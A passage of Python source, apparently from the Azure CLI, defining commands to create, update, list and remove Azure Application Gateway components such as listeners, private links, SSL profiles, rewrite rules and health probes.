new_config = ApplicationGatewayFrontendIPConfiguration(
name=item_name,
public_ip_address=SubResource(id=public_ip_address))
else:
new_config = ApplicationGatewayFrontendIPConfiguration(
name=item_name,
private_ip_address=private_ip_address if private_ip_address else None,
private_ip_allocation_method='Static' if private_ip_address else 'Dynamic',
subnet=SubResource(id=subnet))
upsert_to_collection(ag, 'frontend_ip_configurations', new_config, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_frontend_ip_configuration(cmd, instance, parent, item_name, public_ip_address=None,
subnet=None, virtual_network_name=None,
private_ip_address=None):
SubResource = cmd.get_models('SubResource')
if public_ip_address is not None:
instance.public_ip_address = SubResource(id=public_ip_address)
if subnet is not None:
instance.subnet = SubResource(id=subnet)
if private_ip_address is not None:
instance.private_ip_address = private_ip_address
instance.private_ip_allocation_method = 'Static'
return parent
def create_ag_frontend_port(cmd, resource_group_name, application_gateway_name, item_name, port,
no_wait=False):
ApplicationGatewayFrontendPort = cmd.get_models('ApplicationGatewayFrontendPort')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_port = ApplicationGatewayFrontendPort(name=item_name, port=port)
upsert_to_collection(ag, 'frontend_ports', new_port, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_frontend_port(instance, parent, item_name, port=None):
if port is not None:
instance.port = port
return parent
def create_ag_http_listener(cmd, resource_group_name, application_gateway_name, item_name,
frontend_port, frontend_ip=None, host_name=None, ssl_cert=None,
firewall_policy=None, no_wait=False, host_names=None):
ApplicationGatewayHttpListener, SubResource = cmd.get_models('ApplicationGatewayHttpListener', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
if not frontend_ip:
frontend_ip = _get_default_id(ag, 'frontend_ip_configurations', '--frontend-ip')
new_listener = ApplicationGatewayHttpListener(
name=item_name,
frontend_ip_configuration=SubResource(id=frontend_ip),
frontend_port=SubResource(id=frontend_port),
host_name=host_name,
require_server_name_indication=True if ssl_cert and host_name else None,
protocol='https' if ssl_cert else 'http',
ssl_certificate=SubResource(id=ssl_cert) if ssl_cert else None,
host_names=host_names
)
if cmd.supported_api_version(min_api='2019-09-01'):
new_listener.firewall_policy = SubResource(id=firewall_policy) if firewall_policy else None
upsert_to_collection(ag, 'http_listeners', new_listener, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_http_listener(cmd, instance, parent, item_name, frontend_ip=None, frontend_port=None,
host_name=None, ssl_cert=None, firewall_policy=None, host_names=None):
SubResource = cmd.get_models('SubResource')
if frontend_ip is not None:
instance.frontend_ip_configuration = SubResource(id=frontend_ip)
if frontend_port is not None:
instance.frontend_port = SubResource(id=frontend_port)
if ssl_cert is not None:
if ssl_cert:
instance.ssl_certificate = SubResource(id=ssl_cert)
instance.protocol = 'Https'
else:
instance.ssl_certificate = None
instance.protocol = 'Http'
if host_name is not None:
instance.host_name = host_name or None
if cmd.supported_api_version(min_api='2019-09-01'):
if firewall_policy is not None:
instance.firewall_policy = SubResource(id=firewall_policy)
if host_names is not None:
instance.host_names = host_names or None
instance.require_server_name_indication = instance.host_name and instance.protocol.lower() == 'https'
return parent
def assign_ag_identity(cmd, resource_group_name, application_gateway_name,
user_assigned_identity, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ManagedServiceIdentity, ManagedServiceIdentityUserAssignedIdentitiesValue = \
cmd.get_models('ManagedServiceIdentity',
'Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
user_assigned_indentity_instance = ManagedServiceIdentityUserAssignedIdentitiesValue()
user_assigned_identities_instance = dict()
user_assigned_identities_instance[user_assigned_identity] = user_assigned_indentity_instance
identity_instance = ManagedServiceIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identities_instance
)
ag.identity = identity_instance
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def remove_ag_identity(cmd, resource_group_name, application_gateway_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
if ag.identity is None:
logger.warning("This command will be ignored. The identity doesn't exist.")
ag.identity = None
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def show_ag_identity(cmd, resource_group_name, application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
if ag.identity is None:
raise CLIError("Please first use 'az network application-gateway identity assign` to init the identity.")
return ag.identity
def add_ag_private_link(cmd,
resource_group_name,
application_gateway_name,
frontend_ip,
private_link_name,
private_link_subnet_name_or_id,
private_link_subnet_prefix=None,
private_link_primary=None,
private_link_ip_address=None,
no_wait=False):
(SubResource, IPAllocationMethod, Subnet,
ApplicationGatewayPrivateLinkConfiguration,
ApplicationGatewayPrivateLinkIpConfiguration) = cmd.get_models(
'SubResource', 'IPAllocationMethod', 'Subnet',
'ApplicationGatewayPrivateLinkConfiguration', 'ApplicationGatewayPrivateLinkIpConfiguration')
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
private_link_config_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='applicationGateways',
name=appgw.name,
child_type_1='privateLinkConfigurations',
child_name_1=private_link_name
)
if not any(fic for fic in appgw.frontend_ip_configurations if fic.name == frontend_ip):
raise CLIError("Frontend IP doesn't exist")
for fic in appgw.frontend_ip_configurations:
if fic.private_link_configuration and fic.private_link_configuration.id == private_link_config_id:
raise CLIError('Frontend IP already reference an existing Private Link')
if fic.name == frontend_ip:
break
else:
raise CLIError("Frontend IP doesn't exist")
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
raise CLIError('Private Link name duplicates')
# get the virtual network of this application gateway
vnet_name = parse_resource_id(appgw.gateway_ip_configurations[0].subnet.id)['name']
vnet = ncf.virtual_networks.get(resource_group_name, vnet_name)
# prepare the subnet for new private link
for subnet in vnet.subnets:
if subnet.name == private_link_subnet_name_or_id:
raise CLIError('Subnet duplicates')
if subnet.address_prefix == private_link_subnet_prefix:
raise CLIError('Subnet prefix duplicates')
if subnet.address_prefixes and private_link_subnet_prefix in subnet.address_prefixes:
raise CLIError('Subnet prefix duplicates')
if is_valid_resource_id(private_link_subnet_name_or_id):
private_link_subnet_id = private_link_subnet_name_or_id
else:
private_link_subnet = Subnet(name=private_link_subnet_name_or_id,
address_prefix=private_link_subnet_prefix,
private_link_service_network_policies='Disabled')
private_link_subnet_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_name,
child_type_1='subnets',
child_name_1=private_link_subnet_name_or_id
)
vnet.subnets.append(private_link_subnet)
ncf.virtual_networks.begin_create_or_update(resource_group_name, vnet_name, vnet)
private_link_ip_allocation_method = IPAllocationMethod.static.value if private_link_ip_address \
else IPAllocationMethod.dynamic.value
private_link_ip_config = ApplicationGatewayPrivateLinkIpConfiguration(
name='PrivateLinkDefaultIPConfiguration',
private_ip_address=private_link_ip_address,
private_ip_allocation_method=private_link_ip_allocation_method,
subnet=SubResource(id=private_link_subnet_id),
primary=private_link_primary
)
private_link_config = ApplicationGatewayPrivateLinkConfiguration(
name=private_link_name,
ip_configurations=[private_link_ip_config]
)
# associate the private link with the frontend IP configuration
for fic in appgw.frontend_ip_configurations:
if fic.name == frontend_ip:
fic.private_link_configuration = SubResource(id=private_link_config_id)
appgw.private_link_configurations.append(private_link_config)
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name, appgw)
def show_ag_private_link(cmd,
resource_group_name,
application_gateway_name,
private_link_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
return target_private_link
def list_ag_private_link(cmd,
resource_group_name,
application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
return appgw.private_link_configurations
def remove_ag_private_link(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
removed_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
removed_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
for fic in appgw.frontend_ip_configurations:
if fic.private_link_configuration and fic.private_link_configuration.id == removed_private_link.id:
fic.private_link_configuration = None
# the left vnet have to delete manually
# rs = parse_resource_id(removed_private_link.ip_configurations[0].subnet.id)
# vnet_resource_group, vnet_name, subnet = rs['resource_group'], rs['name'], rs['child_name_1']
# ncf.subnets.delete(vnet_resource_group, vnet_name, subnet)
appgw.private_link_configurations.remove(removed_private_link)
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name,
appgw)
# region application-gateway trusted-client-certificates
def add_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name,
client_cert_data, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
ApplicationGatewayTrustedClientCertificate = cmd.get_models('ApplicationGatewayTrustedClientCertificate')
cert = ApplicationGatewayTrustedClientCertificate(name=client_cert_name, data=client_cert_data)
appgw.trusted_client_certificates.append(cert)
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def list_trusted_client_certificate(cmd, resource_group_name, application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
return appgw.trusted_client_certificates
def remove_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
for cert in appgw.trusted_client_certificates:
if cert.name == client_cert_name:
appgw.trusted_client_certificates.remove(cert)
break
else:
raise ResourceNotFoundError(f"Trusted client certificate {client_cert_name} doesn't exist")
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def show_ag_backend_health(cmd, client, resource_group_name, application_gateway_name, expand=None,
protocol=None, host=None, path=None, timeout=None, host_name_from_http_settings=None,
match_body=None, match_status_codes=None, address_pool=None, http_settings=None):
from azure.cli.core.commands import LongRunningOperation
on_demand_arguments = {protocol, host, path, timeout, host_name_from_http_settings, match_body, match_status_codes,
address_pool, http_settings}
if on_demand_arguments.difference({None}) and cmd.supported_api_version(min_api='2019-04-01'):
SubResource, ApplicationGatewayOnDemandProbe, ApplicationGatewayProbeHealthResponseMatch = cmd.get_models(
"SubResource", "ApplicationGatewayOnDemandProbe", "ApplicationGatewayProbeHealthResponseMatch")
probe_request = ApplicationGatewayOnDemandProbe(
protocol=protocol,
host=host,
path=path,
timeout=timeout,
pick_host_name_from_backend_http_settings=host_name_from_http_settings
)
if match_body is not None or match_status_codes is not None:
probe_request.match = ApplicationGatewayProbeHealthResponseMatch(
body=match_body,
status_codes=match_status_codes,
)
if address_pool is not None:
if not is_valid_resource_id(address_pool):
address_pool = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='applicationGateways',
name=application_gateway_name,
child_type_1='backendAddressPools',
child_name_1=address_pool
)
probe_request.backend_address_pool = SubResource(id=address_pool)
if http_settings is not None:
if not is_valid_resource_id(http_settings):
http_settings = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='applicationGateways',
name=application_gateway_name,
child_type_1='backendHttpSettingsCollection',
child_name_1=http_settings
)
probe_request.backend_http_settings = SubResource(id=http_settings)
return LongRunningOperation(cmd.cli_ctx)(client.begin_backend_health_on_demand(
resource_group_name, application_gateway_name, probe_request, expand))
return LongRunningOperation(cmd.cli_ctx)(client.begin_backend_health(
resource_group_name, application_gateway_name, expand))
# endregion
# region application-gateway ssl-profile
def add_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name, policy_name=None,
policy_type=None, min_protocol_version=None, cipher_suites=None, disabled_ssl_protocols=None,
trusted_client_certificates=None, client_auth_configuration=None, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
(SubResource,
ApplicationGatewaySslPolicy,
ApplicationGatewayClientAuthConfiguration,
ApplicationGatewaySslProfile) = cmd.get_models('SubResource',
'ApplicationGatewaySslPolicy',
'ApplicationGatewayClientAuthConfiguration',
'ApplicationGatewaySslProfile')
sr_trusted_client_certificates = [SubResource(id=item) for item in
trusted_client_certificates] if trusted_client_certificates else None
ssl_policy = ApplicationGatewaySslPolicy(policy_name=policy_name, policy_type=policy_type,
min_protocol_version=min_protocol_version,
cipher_suites=cipher_suites, disabled_ssl_protocols=disabled_ssl_protocols)
client_auth = ApplicationGatewayClientAuthConfiguration(
verify_client_cert_issuer_dn=client_auth_configuration) if client_auth_configuration else None
ssl_profile = ApplicationGatewaySslProfile(trusted_client_certificates=sr_trusted_client_certificates,
ssl_policy=ssl_policy, client_auth_configuration=client_auth,
name=ssl_profile_name)
appgw.ssl_profiles.append(ssl_profile)
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def list_ssl_profile(cmd, resource_group_name, application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
return appgw.ssl_profiles
def remove_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
for profile in appgw.ssl_profiles:
if profile.name == ssl_profile_name:
appgw.ssl_profiles.remove(profile)
break
else:
raise ResourceNotFoundError(f"Ssl profiles {ssl_profile_name} doesn't exist")
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
# endregion
def add_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
private_link_ip_name,
private_link_primary=False,
private_link_ip_address=None,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
(SubResource, IPAllocationMethod,
ApplicationGatewayPrivateLinkIpConfiguration) = \
cmd.get_models('SubResource', 'IPAllocationMethod',
'ApplicationGatewayPrivateLinkIpConfiguration')
private_link_subnet_id = target_private_link.ip_configurations[0].subnet.id
private_link_ip_allocation_method = IPAllocationMethod.static.value if private_link_ip_address \
else IPAllocationMethod.dynamic.value
private_link_ip_config = ApplicationGatewayPrivateLinkIpConfiguration(
name=private_link_ip_name,
private_ip_address=private_link_ip_address,
private_ip_allocation_method=private_link_ip_allocation_method,
subnet=SubResource(id=private_link_subnet_id),
primary=private_link_primary
)
target_private_link.ip_configurations.append(private_link_ip_config)
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name,
appgw)
def show_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
private_link_ip_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
target_private_link_ip_config = None
for pic in target_private_link.ip_configurations:
if pic.name == private_link_ip_name:
target_private_link_ip_config = pic
break
else:
raise CLIError("IP Configuration doesn't exist")
return target_private_link_ip_config
def list_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
return target_private_link.ip_configurations
def remove_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
private_link_ip_name,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
updated_ip_configurations = target_private_link.ip_configurations
for pic in target_private_link.ip_configurations:
if pic.name == private_link_ip_name:
updated_ip_configurations.remove(pic)
break
else:
raise CLIError("IP Configuration doesn't exist")
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name,
appgw)
def create_ag_backend_http_settings_collection(cmd, resource_group_name, application_gateway_name, item_name, port,
probe=None, protocol='http', cookie_based_affinity=None, timeout=None,
no_wait=False, connection_draining_timeout=0,
host_name=None, host_name_from_backend_pool=None,
affinity_cookie_name=None, enable_probe=None, path=None,
auth_certs=None, root_certs=None):
ApplicationGatewayBackendHttpSettings, ApplicationGatewayConnectionDraining, SubResource = cmd.get_models(
'ApplicationGatewayBackendHttpSettings', 'ApplicationGatewayConnectionDraining', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_settings = ApplicationGatewayBackendHttpSettings(
port=port,
protocol=protocol,
cookie_based_affinity=cookie_based_affinity or 'Disabled',
request_timeout=timeout,
probe=SubResource(id=probe) if probe else None,
name=item_name)
if cmd.supported_api_version(min_api='2016-09-01'):
new_settings.authentication_certificates = [SubResource(id=x) for x in auth_certs or []]
if cmd.supported_api_version(min_api='2016-12-01'):
new_settings.connection_draining = \
ApplicationGatewayConnectionDraining(
enabled=bool(connection_draining_timeout), drain_timeout_in_sec=connection_draining_timeout or 1)
if cmd.supported_api_version(min_api='2017-06-01'):
new_settings.host_name = host_name
new_settings.pick_host_name_from_backend_address = host_name_from_backend_pool
new_settings.affinity_cookie_name = affinity_cookie_name
new_settings.probe_enabled = enable_probe
new_settings.path = path
if cmd.supported_api_version(min_api='2019-04-01'):
new_settings.trusted_root_certificates = [SubResource(id=x) for x in root_certs or []]
upsert_to_collection(ag, 'backend_http_settings_collection', new_settings, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_backend_http_settings_collection(cmd, instance, parent, item_name, port=None, probe=None, protocol=None,
cookie_based_affinity=None, timeout=None,
connection_draining_timeout=None,
host_name=None, host_name_from_backend_pool=None,
affinity_cookie_name=None, enable_probe=None, path=None,
auth_certs=None, root_certs=None):
SubResource = cmd.get_models('SubResource')
if auth_certs == "":
instance.authentication_certificates = None
elif auth_certs is not None:
instance.authentication_certificates = [SubResource(id=x) for x in auth_certs]
if root_certs == "":
instance.trusted_root_certificates = None
elif root_certs is not None:
instance.trusted_root_certificates = [SubResource(id=x) for x in root_certs]
if port is not None:
instance.port = port
if probe is not None:
instance.probe = SubResource(id=probe)
if protocol is not None:
instance.protocol = protocol
if cookie_based_affinity is not None:
instance.cookie_based_affinity = cookie_based_affinity
if timeout is not None:
instance.request_timeout = timeout
if connection_draining_timeout is not None:
instance.connection_draining = {
'enabled': bool(connection_draining_timeout),
'drain_timeout_in_sec': connection_draining_timeout or 1
}
if host_name is not None:
instance.host_name = host_name
if host_name_from_backend_pool is not None:
instance.pick_host_name_from_backend_address = host_name_from_backend_pool
if affinity_cookie_name is not None:
instance.affinity_cookie_name = affinity_cookie_name
if enable_probe is not None:
instance.probe_enabled = enable_probe
if path is not None:
instance.path = path
return parent
def create_ag_redirect_configuration(cmd, resource_group_name, application_gateway_name, item_name, redirect_type,
target_listener=None, target_url=None, include_path=None,
include_query_string=None, no_wait=False):
ApplicationGatewayRedirectConfiguration, SubResource = cmd.get_models(
'ApplicationGatewayRedirectConfiguration', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
new_config = ApplicationGatewayRedirectConfiguration(
name=item_name,
redirect_type=redirect_type,
target_listener=SubResource(id=target_listener) if target_listener else None,
target_url=target_url,
include_path=include_path,
include_query_string=include_query_string)
upsert_to_collection(ag, 'redirect_configurations', new_config, 'name')
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def update_ag_redirect_configuration(cmd, instance, parent, item_name, redirect_type=None,
target_listener=None, target_url=None, include_path=None,
include_query_string=None, raw=False):
SubResource = cmd.get_models('SubResource')
if redirect_type:
instance.redirect_type = redirect_type
if target_listener:
instance.target_listener = SubResource(id=target_listener)
instance.target_url = None
if target_url:
instance.target_listener = None
instance.target_url = target_url
if include_path is not None:
instance.include_path = include_path
if include_query_string is not None:
instance.include_query_string = include_query_string
return parent
def create_ag_rewrite_rule_set(cmd, resource_group_name, application_gateway_name, item_name, no_wait=False):
ApplicationGatewayRewriteRuleSet = cmd.get_models(
'ApplicationGatewayRewriteRuleSet')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
new_set = ApplicationGatewayRewriteRuleSet(name=item_name)
upsert_to_collection(ag, 'rewrite_rule_sets', new_set, 'name')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
parent = sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag).result()
return find_child_item(parent, item_name,
path='rewrite_rule_sets', key_path='name')
def update_ag_rewrite_rule_set(instance, parent, item_name):
return parent
def create_ag_rewrite_rule(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name,
sequence=None, request_headers=None, response_headers=None, no_wait=False,
modified_path=None, modified_query_string=None, enable_reroute=None):
(ApplicationGatewayRewriteRule,
ApplicationGatewayRewriteRuleActionSet,
ApplicationGatewayUrlConfiguration) = cmd.get_models('ApplicationGatewayRewriteRule',
'ApplicationGatewayRewriteRuleActionSet',
'ApplicationGatewayUrlConfiguration')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
rule_set = find_child_item(ag, rule_set_name,
path='rewrite_rule_sets', key_path='name')
url_configuration = None
if any([modified_path, modified_query_string, enable_reroute]):
url_configuration = ApplicationGatewayUrlConfiguration(modified_path=modified_path,
modified_query_string=modified_query_string,
reroute=enable_reroute)
new_rule = ApplicationGatewayRewriteRule(
name=rule_name,
rule_sequence=sequence,
action_set=ApplicationGatewayRewriteRuleActionSet(
request_header_configurations=request_headers,
response_header_configurations=response_headers,
url_configuration=url_configuration
)
)
upsert_to_collection(rule_set, 'rewrite_rules', new_rule, 'name')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
parent = sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag).result()
return find_child_item(parent, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
def update_ag_rewrite_rule(instance, parent, cmd, rule_set_name, rule_name, sequence=None,
request_headers=None, response_headers=None,
modified_path=None, modified_query_string=None, enable_reroute=None):
with cmd.update_context(instance) as c:
c.set_param('rule_sequence', sequence)
c.set_param('action_set.request_header_configurations', request_headers)
c.set_param('action_set.response_header_configurations', response_headers)
ApplicationGatewayUrlConfiguration = cmd.get_models('ApplicationGatewayUrlConfiguration')
url_configuration = None
if any([modified_path, modified_query_string, enable_reroute]):
url_configuration = ApplicationGatewayUrlConfiguration(modified_path=modified_path,
modified_query_string=modified_query_string,
reroute=enable_reroute)
c.set_param('action_set.url_configuration', url_configuration)
return parent
def show_ag_rewrite_rule(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_item(gateway, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
def list_ag_rewrite_rules(cmd, resource_group_name, application_gateway_name, rule_set_name):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_collection(gateway, rule_set_name, path='rewrite_rule_sets.rewrite_rules', key_path='name')
def delete_ag_rewrite_rule(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name, no_wait=None):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
rule_set = find_child_item(gateway, rule_set_name, path='rewrite_rule_sets', key_path='name')
rule = find_child_item(rule_set, rule_name, path='rewrite_rules', key_path='name')
rule_set.rewrite_rules.remove(rule)
sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, application_gateway_name, gateway)
def create_ag_rewrite_rule_condition(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name,
variable, no_wait=False, pattern=None, ignore_case=None, negate=None):
ApplicationGatewayRewriteRuleCondition = cmd.get_models(
'ApplicationGatewayRewriteRuleCondition')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
rule = find_child_item(ag, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
new_condition = ApplicationGatewayRewriteRuleCondition(
variable=variable,
pattern=pattern,
ignore_case=ignore_case,
negate=negate
)
upsert_to_collection(rule, 'conditions', new_condition, 'variable')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
parent = sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag).result()
return find_child_item(parent, rule_set_name, rule_name, variable,
path='rewrite_rule_sets.rewrite_rules.conditions', key_path='name.name.variable')
def update_ag_rewrite_rule_condition(instance, parent, cmd, rule_set_name, rule_name, variable, pattern=None,
ignore_case=None, negate=None):
with cmd.update_context(instance) as c:
c.set_param('pattern', pattern)
c.set_param('ignore_case', ignore_case)
c.set_param('negate', negate)
return parent
def show_ag_rewrite_rule_condition(cmd, resource_group_name, application_gateway_name, rule_set_name,
rule_name, variable):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_item(gateway, rule_set_name, rule_name, variable,
path='rewrite_rule_sets.rewrite_rules.conditions', key_path='name.name.variable')
def list_ag_rewrite_rule_conditions(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_collection(gateway, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules.conditions', key_path='name.name')
def delete_ag_rewrite_rule_condition(cmd, resource_group_name, application_gateway_name, rule_set_name,
rule_name, variable, no_wait=None):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
rule = find_child_item(gateway, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
condition = find_child_item(rule, variable, path='conditions', key_path='variable')
rule.conditions.remove(condition)
sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, application_gateway_name, gateway)
def create_ag_probe(cmd, resource_group_name, application_gateway_name, item_name, protocol, host,
path, interval=30, timeout=120, threshold=8, no_wait=False, host_name_from_http_settings=None,
min_servers=None, match_body=None, match_status_codes=None, port=None):
ApplicationGatewayProbe, ProbeMatchCriteria = cmd.get_models(
'ApplicationGatewayProbe', 'ApplicationGatewayProbeHealthResponseMatch')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_probe = ApplicationGatewayProbe(
name=item_name,
protocol=protocol,
host=host,
path=path,
interval=interval,
timeout=timeout,
unhealthy_threshold=threshold)
if cmd.supported_api_version(min_api='2017-06-01'):
new_probe.pick_host_name_from_backend_http_settings = host_name_from_http_settings
new_probe.min_servers = min_servers
new_probe.match = ProbeMatchCriteria(body=match_body, status_codes=match_status_codes)
if cmd.supported_api_version(min_api='2019-04-01'):
new_probe.port = port
upsert_to_collection(ag, 'probes', new_probe, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_probe(cmd, instance, parent, item_name, protocol=None, host=None, path=None,
interval=None, timeout=None, threshold=None, host_name_from_http_settings=None,
min_servers=None, match_body=None, match_status_codes=None, port=None):
if protocol is not None:
instance.protocol = protocol
if host is not None:
instance.host = host
if path is not None:
instance.path = path
if interval is not None:
instance.interval = interval
if timeout is not None:
instance.timeout = timeout
if threshold is not None:
instance.unhealthy_threshold = threshold
if host_name_from_http_settings is not None:
instance.pick_host_name_from_backend_http_settings = host_name_from_http_settings
if min_servers is not None:
instance.min_servers = min_servers
if match_body is not None or match_status_codes is not None:
ProbeMatchCriteria = \
cmd.get_models('ApplicationGatewayProbeHealthResponseMatch')
instance.match = instance.match or ProbeMatchCriteria()
if match_body is not None:
